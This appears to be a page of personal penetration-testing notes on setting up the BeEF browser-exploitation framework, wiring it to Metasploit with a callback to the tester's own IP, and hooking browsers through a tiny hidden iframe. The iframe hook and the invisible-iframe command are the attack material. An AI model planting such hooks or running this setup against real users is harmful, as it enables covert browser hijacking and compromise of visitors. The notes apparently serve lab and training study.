beef browser exploitation

beef-xss installation

# clone from git in /opt
- sudo git clone https://github.com/beefproject/beef
./install

# enable connection to msf
# change default user:pass
$ subl /etc/beef-xss/config.yaml
credentials:
    user:   "kashz"
    passwd: "beef-xss"
metasploit:
    enable: true

Connect MSF with beef

$ subl /usr/share/beef-xss/extensions/metasploit/config.yaml
host: "<tun0-IP>"
callback_host: "<tun0-IP>"

Launch beef

# launch msf first
$ msfconsole -q
msf6 > load msgrpc ServerHost=<tun0-IP> Pass=kashz
[*] MSGRPC Service:  <>
[*] MSGRPC Username: msf
[*] MSGRPC Password: kashz
[*] Successfully loaded plugin: msgrpc

$ sudo /usr/share/beef-xss/beef -x
# takes a min to load everything up

iFrame manual hook

<iframe src="<URL>" style="position: absolute;width:5;height:5;border:5;"></iframe>

Send via beef

Commands > Misc > Create Invisible iFrame
# set URL as given by msf

Previoussocat shells Nextwindows-post-exploitation

Last updated 4 years ago

Was this helpful?